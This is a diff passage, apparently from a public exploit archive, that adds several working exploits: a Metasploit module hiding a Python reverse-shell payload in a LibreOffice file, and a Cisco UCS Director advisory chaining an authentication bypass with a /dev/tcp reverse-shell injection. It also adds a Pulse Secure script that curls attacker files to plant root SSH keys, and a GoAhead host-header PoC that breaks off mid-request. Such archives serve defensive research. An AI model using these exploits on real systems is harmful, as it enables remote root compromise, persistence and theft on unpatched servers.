+          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],
+          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],
+          [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
+        ],
+      'DisclosureDate'  => '2019-07-16',
+      'Platform'        => 'python',
+      'Arch'            => ARCH_PYTHON,
+      'DefaultOptions'  => { 'Payload' => 'python/meterpreter/reverse_tcp' },
+      'Targets'         => [ ['Automatic', {}] ],
+      'DefaultTarget'   =>  0
+    ))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
+      OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
+    ])
+  end
+
+  def gen_file
+    text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
+    py_code = Rex::Text.encode_base64(payload.encoded)
+    @cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"
+    @cmd = Rex::Text.html_encode(@cmd)
+
+    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
+    libre_file = ERB.new(fodt_file).result(binding())
+
+    print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")
+
+    libre_file
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, 'Cannot find template file')
+  end
+
+  def exploit
+    fodt_file = gen_file
+
+    file_create(fodt_file)
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47313.txt b/exploits/multiple/remote/47313.txt
new file mode 100644
index 000000000..0221e6027
--- /dev/null
+++ b/exploits/multiple/remote/47313.txt
@@ -0,0 +1,342 @@
+>> Multiple critical vulnerabilities in Cisco UCS Director, Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data
+>> Discovered by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
+=================================================================================
+Disclosure: 21/08/2019 / Last updated: 22/08/2019
+
+
+>> Executive summary:
+Cisco UCS Director (UCS) is a cloud orchestration product that automates common private cloud infrastructure management functions. It is built using Java and a variety of other technologies and distributed as a Linux based virtual appliance. A demo of the UCS virtual appliance can be freely downloaded from Cisco's website [1].
+
+Due to several coding errors, it is possible for an unauthenticated remote attacker with no privileges to bypass authentication and abuse a password change function to inject arbitrary commands and execute code as root.
+In addition, there is a default unprivileged user with a known password that can login via SSH and execute commands on the virtual appliance provided by Cisco. 
+Two Metasploit modules were released with this advisory, one that exploits the authentication bypass and command injection, and another that exploits the default SSH password.
+
+Please note that according to Cisco [2] [3] [4], all three vulnerabilities described in this advisory affect Cisco UCS Director, Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data. However, Agile Information Security only tested Cisco UCS Director.
+
+Agile Information Security would like to thank Accenture Security (previously iDefense) [5] for handling the disclosure process with Cisco.
+
+
+>> Vendor description [6]:
+"Cisco UCS Director delivers a foundation for private cloud Infrastructure as a Service (IaaS). It is a heterogeneous management platform that features multivendor task libraries with more than 2500 out-of-the-box workflow tasks for end-to-end converged and hyperconverged stack automation.
+You can extend your capabilities to:
+- Automate provisioning, orchestration, and management of Cisco and third-party infrastructure resources
+- Order resources and services from an intuitive self-service portal
+- Automate security and isolation models to provide repeatable services
+- Standardize and automate multitenant environments across shared infrastructure instances"
+
+
+>> Technical details:
+#1
+Vulnerability: Web Interface Authentication Bypass / CWE-287
+CVE-2019-1937
+Cisco Bug ID: CSCvp19229 [2]
+Risk Classification: Critical
+Attack Vector: Remote
+Constraints: No authentication required
+Affected versions: confirmed in Cisco UCS Director versions 6.6.0 and 6.7.0, see [2] for Cisco's list of affected versions
+
+UCS exposes a management web interface on ports 80 and 443 so that users of UCS can perform cloud management functions.
+Due to a number of coding errors and bad practices, it is possible for an unauthenticated attacker to obtain an administrative session by bypassing authentication. 
+The following sequence of requests and responses shows the authentication bypass works.
+
+1.1) First we send a request to ClientServlet to check our authentication status:
+GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1
+Host: 10.0.3.100
+Referer: https://10.0.3.100/
+X-Requested-With: XMLHttpRequest
+
+... to which the server responds with a redirect to the login page since we are not authenticated:
+HTTP/1.1 302 Found
+Location: https://10.0.3.100/app/ui/login.jsp
+Content-Length: 0
+Server: Web
+
+1.2) We now follow the redirection to obtain a JSESSIONID cookie:
+GET /app/ui/login.jsp HTTP/1.1
+Host: 10.0.3.100
+Referer: https://10.0.3.100/
+X-Requested-With: XMLHttpRequest
+
+And the server responds with our cookie:
+HTTP/1.1 200 OK
+Set-Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC745; Path=/app; Secure; HttpOnly
+Server: Web
+
+1.3) Then we repeat the request from 1.1), but this time with the JSESSIONID cookie obtained in 1.2):
+GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1
+Host: 10.0.3.100
+Referer: https://10.0.3.100/
+Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC74;
+X-Requested-With: XMLHttpRequest
+
+... and we still get redirected to the login page, as in step 1.1):
+HTTP/1.1 302 Found
+Location: https://10.0.3.100/app/ui/login.jsp
+Content-Length: 0
+Server: Web
+
+1.4) To completely bypass authentication, we just need to send the JSESSIONID cookie with added X-Starship-UserSession-Key and X-Starship-Request-Key HTTP headers set to random values:
+GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1
+Host: 10.0.3.100
+Referer: https://10.0.3.100/
+X-Starship-UserSession-Key: ble
+X-Starship-Request-Key: bla
+Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC74;
+X-Requested-With: XMLHttpRequest
+
+HTTP/1.1 200 OK
+Set-Cookie: JSESSIONID=971D41B487F637DA84FCAF9E97A479429D4031F465DA445168A493254AA104E3; Path=/app; Secure; HttpOnly
+Connection: close
+Server: Web
+Content-Length: 428
+
+{"productaccess_id":0,"loginName":"admin","productId":"cloupia_service_portal","accessLevel":null,"isEulaAccepted":false,"eulaAcceptTime":null,"eulaSrcHost":null,"restKey":"bla","allowedOperations":null,"userType":null,"server":null,"domainName":null,"suspend":false,"starshipUserId":null,"starshipUserLocale":null,"isAdminPasswordReset":true,"profileId":0,"credentialId":"","isClassicUIEnabled":false,"starshipSessionId":"ble"}
+
+... and just like that, we can see from the information the server returned that we are logged in as the "admin" user! From now on, we need to use the new JSESSIONID cookie returned by the server in 1.4) to have full administrative access to the UCS web interface.
+
+To summarise, our exploit needs to:
+a) obtain a JSESSIONID cookie
+b) "authenticate" it by sending a request to ClientServlet with the X-Starship-UserSession-Key and X-Starship-Request-Key HTTP headers set to random values
+c) use the new JSESSIONID cookie returned in b) as the "admin" authenticated cookie
+
+In some cases, the server will authenticate the old cookie and not return a new one, but the effect is the same - the "old" JSESSIONID cookie will be authenticated as an "admin" cookie.
+
+Let's dig into the decompiled code, and see what is happening under the hood.
+
+All the coding errors that make this possible are in the class com.cloupia.client.web.auth.AuthenticationFilter, which as a javax.servlet.Filter subclass whose doFilter() function is invoked on every request that the server receives (as configured by the web application).
+
+A snippet of com.cloupia.client.web.auth.AuthenticationFilter.doFilter() is shown below, with comments preceded with ^^^:
+
+    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) {
+      (...)
+            httpRequest = (HttpServletRequest)request;
+            logger.debug("doFilter url: " + httpRequest.getRequestURL().toString());
+            boolean isAuthenticated = this.authenticateUser(httpRequest);
+              ^^^ 1.5) invokes authenticateUser() (function shown below)
+              
+            String samlLogoutRequest;
+            if(!isAuthenticated) {
+              ^^^ 1.6) if authenticateUser() returns false, we go into this branch
+              
+                samlLogoutRequest = request.getParameter("SAMLResponse");
+                logger.info("samlResponse-->" + samlLogoutRequest);
+                if(samlLogoutRequest != null) {
+                    this.handleSAMLReponse(request, response, chain, samlLogoutRequest);
+                } else {
+                  ^^^ 1.7) if there is no SAMLResponse HTTP parameter, we go into this branch
+                  
+                    HttpSession session;
+                    ProductAccess userBean;
+                    String requestedUri;
+                    if(this.isStarshipRequest(httpRequest)) {
+                      ^^^ 1.8) checks if isStarshipRequest() returns true (function shown below)
+                      
+                        session = null != httpRequest.getSession(false)?httpRequest.getSession(false):httpRequest.getSession(true);
+                        userBean = (ProductAccess)session.getAttribute("USER_IN_SESSION");
+                        if(userBean == null) {
+                          ^^^ 1.9) if there is no session server side for this request, follow into this branch...
+                          
+                            try {
+                                userBean = new ProductAccess();
+                                userBean.setCredentialId("");
+                                userBean.setAdminPasswordReset(true);
+                                userBean.setProductId("cloupia_service_portal");
+                                userBean.setProfileId(0);
+                                userBean.setRestKey(httpRequest.getHeader("X-Starship-Request-Key"));
+                                userBean.setStarshipUserId(httpRequest.getHeader("X-Starship-UserName-Key"));
+                                userBean.setLoginName("admin");
+                                  ^^^ 1.10) and create a new session with the user as "admin"!
+                                  
+                                userBean.setStarshipSessionId(httpRequest.getHeader("X-Starship-UserSession-Key"));
+                                requestedUri = httpRequest.getHeader("X-Starship-UserRoles-Key");
+                                userBean.setAccessLevel(requestedUri);
+                                if(requestedUri != null && requestedUri.equalsIgnoreCase("admin")) {
+                                    AuthenticationManager authmgr = AuthenticationManager.getInstance();
+                                    userBean.setAccessLevel("Admin");
+                                    authmgr.evaluateAllowedOperations(userBean);
+                                }
+
+                                session.setAttribute("USER_IN_SESSION", userBean);
+                                session.setAttribute("DEFAULT_URL", STARSHIP_DEFAULT_URL);
+                                logger.info("userBean:" + userBean.getAccessLevel());
+                            } catch (Exception var12) {
+                                logger.info("username/password wrong for rest api access - " + var12.getMessage());
+                            }
+
+                            logger.info("userBean: " + userBean.getAccessLevel());
+                        }
+
+                        chain.doFilter(request, response);
+      (...)
+    }
+    
+As it can be read in the inline comments in the function above, our first hurdle at 1.5) is to make authenticateUser() return false:
+
+    private boolean authenticateUser(HttpServletRequest request) {
+        boolean isValidUser = false;
+        HttpSession session = null;
+        session = request.getSession(false);
+          ^^^ 1.11) get the session for this request
+          
+        if(session != null) {
+            ProductAccess user = (ProductAccess)session.getAttribute("USER_IN_SESSION");
+            if(user != null) {
+                isValidUser = true;
+                if(this.isStarshipRequest(request) && !user.isStarshipAccess(request.getHeader("X-Starship-UserSession-Key"))) {
+                    isValidUser = false;
+                } else {
+                    logger.debug("AuthenticationFilter:authenticateUser - User " + user.getLoginName() + " has been previously authenticated");
+                }
+            }
+        } else {
+            logger.info("AuthenticationFilter:authenticateUser - session is null");
+              ^^^ 1.12) no session found, return isValidUser which is false as set at the start of the function
+              
+        }
+
+        return isValidUser;
+    }
+    
+This is easily done, and it works as expected - we do not have a session, so at 1.11) the session is null, and then we go into 1.12) which makes the function return false.
+
+We now go back to the doFilter() function, and go into the branch in 1.6). As we have not sent a SAMLResponse HTTP parameter, we follow into the 1.7) branch.
+Now we get to the critical part in 1.8). Here, isStarshipRequest() is invoked, and if it returns true, the server will create an "admin" session for us...
+
+    private boolean isStarshipRequest(HttpServletRequest httpRequest) {
+        return null != httpRequest.getHeader("X-Starship-UserSession-Key") && null != httpRequest.getHeader("X-Starship-Request-Key");
+    }
+
+isStarshipRequest() is shown above, and clearly the only thing we need to do to make it return true is to set the X-Starship-UserSession-Key and X-Starship-Request-Key HTTP headers.
+
+We then follow into 1.9) and 1.10), and we get our administrative session without having any credentials at all!
+Moreover, the session is completely stealthy and invisible to other users, as it does not appear in Administration -> Users and Groups -> All Users Login History nor in Administration -> Users and Groups -> Current Online Users.
+
+
+#2
+Vulnerability: Default password for 'scpuser' / CWE-798
+CVE-2019-1935
+Cisco Bug ID: CSCvp19251 [3]
+Risk Classification: Critical
+Attack Vector: Remote
+Constraints: requires auth, does not, etc
+Affected versions: confirmed in Cisco UCS Director versions 6.6.0 and 6.7.0, see [3] for Cisco's list of affected versions
+
+The UCS virtual appliance is configured with a user 'scpuser' that is supposed to be used for scp file transfer between UCS appliances and other Cisco modules.
+
+According to Cisco's documentation [7]:
+"An SCP user is used by server diagnostics and tech support upload operations for transferring files to the Cisco IMC Supervisor appliance using the SCP protocol. An scp user account cannot be used to login to the Cisco IMC Supervisor UI or the shelladmin."
+
+The web interface contains functionality to change the user password for the 'scpuser' in Administration -> Users and Groups -> SCP User Configuration, and in this page it says:
+"The 'scpuser' will be configured on this appliance in order to enable file transfer operations via the 'scp' command. This user account cannot be used to login to the GUI or shelladmin"
+
+Apparently this is not true and not only the user can log in via SSH per default, but it does so with a default password of 'scpuser' if it not changed by the administrator after installation:
+UCS > ssh scpuser@10.0.3.100
+Password: <scpuser>
+[scpuser@localhost ~]$ whoami
+scpuser
+
+
+#3
+Vulnerability: Authenticated command injection via the web interface as root (CWE-78)
+CVE-2019-1936
+Cisco Bug ID: CSCvp19245 [4]
+Risk Classification: Critical
+Attack Vector: Remote
+Constraints: requires authentication to the UCS web interface
+Affected versions: confirmed in Cisco UCS Director versions 6.6 and 6.7, see [4] for Cisco's list of affected versions
+
+As shown in #2, the web interface contains functionality to change the user password for the 'scpuser' in Administration -> Users and Groups -> SCP User Configuration.
+
+This is handled by the Java class com.cloupia.feature.cimc.forms.SCPUserConfigurationForm in doFormSubmit(), which is shown below, with my markers and comments preceded with ^^^:
+
+    public FormResult doFormSubmit(String user, ReportContext context, String formId, FormFieldData[] data) throws Exception {
+        logger.info((Object)"doFormSubmit invoked ");
+        FormResult result = this.validateForm(context, this.getDefinition(), formId, data, true);
+        if (result.getStatus() == 0) {
+            try {
+                SCPUserConfig existingConfig;
+                FormFieldDataList datalist = new FormFieldDataList(data);
+                String password = datalist.getById(FIELD_ID_PASSWORD).getValue();
+                        ^^^ 3.1) gets "password" from the form sent by the user
+                SCPUserConfig newSCPUserConfig = new SCPUserConfig();
+                newSCPUserConfig.setPassword(password);
+                if ("**********".equals(password) && (existingConfig = CIMCPersistenceUtil.getSCPUserConfig()) != null) {
+                    newSCPUserConfig.setPassword(existingConfig.getPassword());
+                }
+                CIMCPersistenceUtil.setSCPUserConfig(newSCPUserConfig);
+                Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "echo -e \"" + password + "\\n" + password + "\" | (passwd --stdin " + "scpuser" + ")"});
+                        ^^^ 3.2) runs /bin/sh with "password" argument
+                p.waitFor();
+                datalist.getById(FIELD_ID_PASSWORD).setValue("**********");
+                result.setStatus(2);
+                result.setStatusMessage(RBUtil.getString((String)"CIMCControllerFeature.form.scpuser.success.label"));
+                return result;
+            }
+            catch (Exception ex) {
+                result.setStatusMessage(ex.getMessage());
+                result.setStatus(1);
+                return result;
+            }
+        }
+        return result;
+    }
+}
+
+In 3.1) we see that the function gets the "password" field from the from sent by the user, and in 3.2) it passes this input directly to Runtime.getRuntime().exec(), which leads to a clear command injection. This is run as root, as the web server runs as root and superuser access would be necessary anyway to change a password of another user.
+
+To obtain a reverse shell, we can send the following payload to ClientServlet, which will then invoke the SCPUserConfigurationForm.doFormSubmit():
+POST /app/ui/ClientServlet HTTP/1.1
+Host: 10.0.3.100
+Referer: https://10.0.3.100/app/ux/index.html
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 945
+Cookie: JSESSIONID=C72361B8C66F8FDF871F94C1FC1E07974E9B5B9E1C953D713E4DC305CB2D4CD1
+
+formatType=json&apiName=ExecuteGenericOp&serviceName=InfraMgr&opName=doFormSubmit&opData=%7B%22param0%22%3A%22admin%22%2C%22param1%22%3A%7B%22ids%22%3Anull%2C%22targetCuicId%22%3Anull%2C%22uiMenuTag%22%3A23%2C%22cloudName%22%3Anull%2C%22filterId%22%3Anull%2C%22id%22%3Anull%2C%22type%22%3A10%7D%2C%22param2%22%3A%22scpUserConfig%22%2C%22param3%22%3A%5B%7B%22fieldId%22%3A%22FIELD_ID_USERNAME%22%2C%22value%22%3A%22scpuser%22%7D%2C%7B%22fieldId%22%3A%22FIELD_ID_DESCRIPTION%22%2C%22value%22%3A%22The%20'scpuser'%20will%20be%20configured%20on%20this%20appliance%20in%20order%20to%20enable%20file%20transfer%20operations%20via%20the%20'scp'%20command.%20This%20user%20account%20cannot%20be%20used%20to%20login%20to%20the%20GUI%20or%20shelladmin.%22%7D%2C%7B%22fieldId%22%3A%22FIELD_ID_PASSWORD%22%2C%22value%22%3A%22%60%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%33%2e%39%2f%34%34%34%34%20%30%3e%26%31%60%22%7D%5D%7D
+
+In the example above, the FIELD_ID_PASSWORD is set to "`bash -i >& /dev/tcp/10.0.3.9/4444 0>&1`", which returns a reverse shell to host 10.0.3.9 on port 4444 running as root:
+
+UCS > nc -lvkp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Connection from 10.0.3.100 55432 received!
+bash: no job control in this shell
+[root@localhost inframgr]# whoami
+root
+
+
+>> Exploitation summary:
+By chaining vulnerability #1 (authentication bypass) with vulnerability #3 (authenticated command injection as root), it is clear that an unauthenticated attacker with no privileges on the system can execute code as root, leading to total compromise of Cisco UCS Director.
+
+
+>> Vulnerability Fixes / Mitigation:
+According to Cisco [2] [3] [4] the three vulnerabilities described in this advisory were fixed in the product versions described below:
+Cisco IMC Supervisor releases 2.2.1.0 and later
+Cisco UCS Director releases 6.7.2.0 and later (recommended: 6.7.3.0)
+Cisco UCS Director Express for Big Data releases 3.7.2.0 and later (recommended: 3.7.3.0)
+
+
+>> References:
+[1] https://www.cisco.com/c/en/us/support/servers-unified-computing/ucs-director-evaluation/model.html
+[2] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby
+[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred
+[4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj
+[5] https://www.accenture.com/us-en/service-idefense-security-intelligence
+[6] https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-director/index.html
+[7] https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-director/rack-server-guide/6-7/cisco-ucs-director-rack-server-mgmt-guide-67/cisco-ucs-director-rack-server-mgmt-guide-67_chapter_01011.html#task_1599289A49FB49D48486A66A8358A2AD
+
+
+>> Disclaimer:
+Please note that Agile Information Security (Agile InfoSec) relies on information provided by the vendor when listing fixed versions or products. Agile InfoSec does not verify this information, except when specifically mentioned in this advisory or when requested or contracted by the vendor to do so. 
+Unconfirmed vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerabilities found by Agile Information Security are resolved properly.
+Agile Information Security Limited does not accept any responsibility, financial or otherwise, from any material losses, loss of life or reputational loss as a result of misuse of the information or code contained or mentioned in this advisory.
+It is the vendor's responsibility to ensure their products' security before, during and after release to market.
+
+All information, code and binary data in this advisory is released to the public under the GNU General Public License, version 3 (GPLv3).
+For information, code or binary data obtained from other sources that has a license which is incompatible with GPLv3, the original license prevails. 
+For more information check https://www.gnu.org/licenses/gpl-3.0.en.html
+
+================
+Agile Information Security Limited
+http://www.agileinfosec.co.uk/
+>> Enabling secure digital business.
\ No newline at end of file
diff --git a/exploits/multiple/remote/47354.py b/exploits/multiple/remote/47354.py
new file mode 100755
index 000000000..0930391d3
--- /dev/null
+++ b/exploits/multiple/remote/47354.py
@@ -0,0 +1,157 @@
+#!/usr/bin/python
+#
+# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
+# Google Dork: inurl:/dana-na/ filetype:cgi
+# Date: 09/05/2019
+# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
+# Vendor Homepage: https://pulsesecure.net
+# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+# Tested on: linux
+# CVE : CVE-2019-11539
+#
+# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
+#
+# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
+# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
+# You will need your own configuration and authorized_keys files.
+#
+# Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
+# Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
+#
+# Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization.
+# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free.
+#
+# Imports
+import requests
+import urllib
+from bs4 import BeautifulSoup
+
+# Host information
+host = '' # Host to exploit
+login_url = '/dana-na/auth/url_admin/login.cgi' # Login page
+CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump
+CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code
+
+# Login Credentials
+user = 'admin' # Default Username
+password = 'password' # Default Password
+
+# Necessary for Curl
+downloadHost = '' # IP or FQDN for host running webserver
+port = '' # Port where web service is running. Needs to be a string, hence the quotes.
+
+# Proxy Configuration
+# Uncomment if you need to use a proxy or for debugging requests
+proxies = {
+    # 'http': 'http://127.0.0.1:8080',
+    # 'https': 'http://127.0.0.1:8080',
+}
+
+# Headers for requests
+headers = {
+    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
+    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+    'Accept-Language':'en-US,en;q=0.5',
+    'Accept-Encoding':'gzip, deflate',
+    'Content-Type':'application/x-www-form-urlencoded',
+}
+
+# Cookies to send with request
+cookies = {
+    'lastRealm':'Admin%20Users',
+    'DSSIGNIN':'url_admin',
+    'DSSignInURL':'/admin/',
+    'DSPERSISTMSG':'',
+}
+
+# Data for post request
+loginData = {
+    'tz_offset': 0,
+    'username': user,
+    'password': password,
+    'realm': 'Admin Users',
+    'btnSubmit': 'Sign In',
+}
+
+s = requests.Session() # Sets up the session
+s.proxies = proxies # Sets up the proxies
+
+# Disable Warnings from requests library
+requests.packages.urllib3.disable_warnings()
+
+# Administrator Login logic
+# Probably wouldn't have figured this out without help from @buffaloverflow
+def adminLogin():
+    global xsAuth
+    global _headers
+
+    # Send the intial request
+    r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies)
+
+    print('[#] Logging in...') # Self Explanatory
+    r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request
+    print('[#] Sent Login Request...')
+
+    # Login Logic
+    if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""):
+        referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer
+        r = s.get(referer, verify=False) # Sends a get request
+        soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
+        FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr
+        print('[#] Grabbing xsauth...')
+        xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
+        print('[!] Got xsauth: ' + xsAuth) # Self Explanatory
+        data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page
+        _headers = headers # Sets the headers
+        _headers.update({'referer':referer}) # Updates the headers
+        r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request
+
+    print('[+] Logged in!') # Self Explanatory
+
+# Command injection logic
+def cmdInject(command):
+    r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies)
+    if r.status_code == 200:
+        soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
+        xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
+        payload = {
+            'a':'td',
+            'chkInternal':'On',
+            'optIFInternal':'int0',
+            'pmisc':'on',
+            'filter':'',
+            'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command,
+            'toggle':'Start+Sniffing',
+            'xsauth':xsAuth
+        }
+        # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie
+        DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")}
+        # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run
+        # Sends the get request to overwrite the template
+        r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies)
+        # Sends the get request to execute the code
+        r = s.get('https://' + host + CommandExecURL, verify=False)
+
+# Main logic
+if __name__ == '__main__':
+    adminLogin()
+    try:
+        print('[!] Starting Exploit')
+        print('[*] Opening Firewall port...')
+        cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port
+        print('[*] Downloading Necessary Files....')
+        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config
+        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys
+        print('[*] Backing up Files...')
+        cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config
+        cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys
+        print('[*] Overwriting Old Files...')
+        cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config
+        cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys
+        print('[*] Restarting SSHD...')
+        cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP
+        print('[!] Done Exploiting the system.')
+        print('[!] Please use the following command:')
+        print('[!] ssh -p6667 root@%s') %(host)
+    except Exception as e:
+        raise
\ No newline at end of file
diff --git a/exploits/multiple/remote/47439.txt b/exploits/multiple/remote/47439.txt
new file mode 100644
index 000000000..c2c348c18
--- /dev/null
+++ b/exploits/multiple/remote/47439.txt
@@ -0,0 +1,99 @@
+# Exploit Title: GoAhead Web server HTTP Header Injection.
+# Shodan Query: Server: Goahead
+# Discovered Date: 05/07/2019
+# Exploit Author: Ramikan
+# Vendor Homepage: https://www.embedthis.com/goahead/
+# Affected Version: 2.5.0 may be others.
+# Tested On Version: 2.5.0 in Cisco Switches and Net Gear routers.
+# Vendor Fix: N/A
+# CVE : N/A
+# CVSS v3: N/A
+# Category: Hardware, Web Apps
+# Reference : www.fact-in-hack.blogspot.com
+
+Vulnerability: Host Header Injection
+
+A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
+
+An issue was discovered in GoAhead web server version 2.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
+
+PS: Affected on most of embedded webservers on hardware such as switches, routers, IOT and IP cameras. 
+
+
+POC: 1
+
+Request:
+
+POST /goform/login HTTP/1.1
+Host: myevilwebsite.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 46
+Connection: close
+Referer: https://46725846267.com/login.asp
+Upgrade-Insecure-Requests: 1
+
+username=admin&password=admin&language=english
+
+
+Response:
+
+
+HTTP/1.0 302 Redirect
+Server: Goahead/2.5.0 PeerSec-MatrixSSL/3.2.1-OPEN
+Date: Fri Jul 12 15:28:29 2019
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+
+<html><head></head><body>
+		This document has moved to a new <a href="https://myevilwebsite.com/login.asp">location</a>.
+		Please update your documents to reflect the new location.
+		</body></html>
+
+POC: 2
+
+Request:
+
+POST /config/log_off_page.htm HTTP/1.1
+Host: google.com:443
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: 12344
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 774
+Connection: close
+Upgrade-Insecure-Requests: 1
+
